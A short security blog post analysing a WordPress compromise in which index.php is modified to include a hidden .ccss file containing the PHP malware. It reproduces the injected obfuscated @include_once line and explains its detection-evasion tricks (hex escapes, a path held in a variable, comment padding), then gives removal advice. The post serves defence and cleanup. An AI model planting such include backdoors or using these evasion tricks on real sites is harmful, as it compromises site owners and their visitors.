The new WordPress tampering technique, the inclusion of .ccss malware, will be explained.
WordPress index.php tampering with .ccss includes
This malware modifies and embeds the following code in the index.php file, which is executed whenever a WordPress page is loaded.
<?php /*307a3*/ $r2r = "/home/*****/w\x70\x2dincludes/images/media/.36050178.ccss"; strpos($r2r, '97to'); @include_once /* 6ejs7 */ ($r2r); /*307a3*/
A.This code uses many techniques to avoid detection of malware.
B.\x converts some strings to UTF-8 decimal type.
C.It once puts the path into a variable to make it harder to match the detection pattern.
D.Putting a comment after @include_once to prevent detection pattern matching.
The comment text (/*307a3*/) of a random string of characters above and below the include statement is used to check whether malware tampering code remains.
The body of the malware is a file with the extension .ccss
The embedded program containing this malicious @include statement is not the malware itself, but a file with a random string + .ccss extension that is loaded by specifying the path with the @include statement.
The .ccss extension is not originally used as a file to be placed on the Web, but its content is a PHP program file like the one shown below, which is loaded and executed by the @include statement.
How do I get rid of this malware?
You need to delete the .ccss file of the include text and the malware itself after detecting or visually inspecting the malware with plugins, etc. The .ccss file of the malware itself may be located in a very deep folder, or its location may vary depending on the site. The .ccss file of the malware itself is located in a very deep folder, or its location varies from site to site, so it may be difficult to manually check each folder one by one.
The malware itself loaded with @include statement converts some strings to UTF-8 decimal type with ⌘x, so it is hard to tell where the path points to at a glance.
Such obfuscated programs can be unobfuscated here
It may be easier to unobfuscate the path and delete the body in that path.
It is also possible that there are other backdoors or other sites on the server that are infected.
We recommend that you use plugins to detect and remove malware from other sites on the server as well, and if this is unmanageable, we recommend that you contact a specialist.